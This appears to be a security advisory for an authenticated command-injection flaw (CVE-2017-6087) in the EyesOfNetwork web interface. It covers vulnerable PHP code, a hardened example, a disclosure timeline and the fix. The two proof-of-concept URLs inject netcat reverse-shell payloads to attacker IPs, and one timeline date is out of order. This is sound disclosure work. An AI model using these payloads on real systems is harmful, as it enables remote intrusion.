Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing authenticated users to execute arbitrary code.

CVE ID: CVE-2017-6087

Access Vector: remote

Security Risk: high

Vulnerability: CWE-78

CVSS Base Score: 7.6

CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Proof of Concept 1

On the attacker's host, we start a handler:

nc -lvp 1337

The selected_events parameter is not correctly filtered before it is used by the shell_exec() function.

It is therefore possible to inject a payload like the one in the request below, which connects back to our handler:

https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;

Vulnerable code

The payload gets injected into the $event[$key] and $ged_command variables of the module/monitoring_ged/ged_functions.php file, line 373:

$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
  if($value["type"] == true){
    if($key == "owner"){
      $event[$key] = $owner;
    }
    $ged_command .= "\"".$event[$key]."\" ";
  }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);

Two other functions in this file are also affected by this problem:

  • delete($selected_events, $queue);
  • ownDisown($selected_events, $queue, $global_action);

Proof of Concept 2

On the attacker's host, we start a handler:

nc -lvp 1337

The module parameter is not correctly filtered before it is used by the shell_exec() function.

Again, we inject our connect-back payload:

https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding

Vulnerable code

In the module/index.php file, line 24, we can see that our payload is injected into the exec() function without any sanitization:

# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {

    $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");

    # Redirect to module page if rpm installed
    if($module!=0) { header('Location: '.$_GET["link"].''); }

}
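The two calls quoted above (ged_functions.php and index.php) share one defect: request-controlled strings are concatenated into a shell command line. The following is an added example, not EyesOfNetwork's code or its actual 5.1 patch, showing how each call can be hardened by quoting every untrusted value with escapeshellarg() and, for the RPM name, validating it against an allow-list pattern first; $path_ged_bin, $ged_type_nbr, $array_ged_packets, $event and $owner are assumed to be set as in the original file, and the allow-list pattern is an assumption.

```php
<?php
// Added example (not the project's code): hardened versions of the two
// shell_exec()/exec() call sites described in this advisory.

// ged_functions.php: every event field becomes exactly one shell argument.
function build_ged_command(string $path_ged_bin, int $ged_type_nbr,
                           array $array_ged_packets, array $event,
                           string $owner): string
{
    $ged_command = "-update -type " . $ged_type_nbr . " ";
    foreach ($array_ged_packets as $key => $value) {
        if ($value["type"] == true) {
            if ($key == "owner") {
                $event[$key] = $owner;
            }
            // escapeshellarg() single-quotes the value and escapes embedded
            // quotes, so ";nc ... -e /bin/bash;" is passed as a literal string
            // instead of terminating the command.
            $ged_command .= escapeshellarg((string) ($event[$key] ?? "")) . " ";
        }
    }
    // $path_ged_bin is configuration, not user input, so it is left as-is.
    return $path_ged_bin . " " . trim($ged_command, " ");
}

// index.php: accept only a plausible package name, then quote it anyway.
function module_is_installed(string $module): bool
{
    // Assumed allow-list: RPM names contain no shell metacharacters, so a
    // value such as "|nc 192.168.1.14 1337 -e /bin/bash" is rejected here.
    if (!preg_match('/^[A-Za-z0-9._+-]+$/', $module)) {
        return false;
    }
    // exec() returns the last output line, here the count printed by wc -l.
    $count = exec("rpm -q " . escapeshellarg($module) . " | grep '.eon' | wc -l");
    return (int) $count !== 0;
}

// Check optional module to load (same control flow as the original).
if (isset($_GET["module"]) && isset($_GET["link"])) {
    if (module_is_installed($_GET["module"])) {
        header('Location: ' . $_GET["link"]);
    }
}
```

The validation step in module_is_installed() is defence in depth: escapeshellarg() alone already keeps the value inside one argument, but rejecting malformed names first means a single request-forging attempt leaves no shell process behind to investigate.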

Timeline (dd/mm/yyyy)

  • 01/10/2016 : Initial discovery.
  • 09/10/2016 : First contact with vendor.
  • 23/10/2016 : Technical details sent to the security contact.
  • 27/10/2016 : Vendor acknowledgement and first patching attempt.
  • 11/10/2016 : Testing the patch revealed that it needed more work.
  • 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
  • 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our responsible disclosure agreement.
  • 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

Solution

Update to version 5.1

Affected versions

  • Version <= 5.0

Credits